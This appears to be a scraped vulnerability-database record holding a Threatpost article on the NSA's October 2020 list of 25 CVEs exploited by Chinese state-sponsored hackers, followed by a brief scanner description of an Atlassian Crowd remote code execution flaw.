"https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-10-22T15:51:14", "bulletinFamily": "info", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "modified": "2020-10-21T20:31:17", "published": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Atlassian Crowd 2.1.x &lt; 3.0.5 / 3.1.x &lt; 3.1.6 / 3.2.x &lt; 3.2.8 / 3.3.x &lt; 3.3.5 / 3.4.x &lt; 3.4.4 RCE (direct check)

Description

The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.

Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)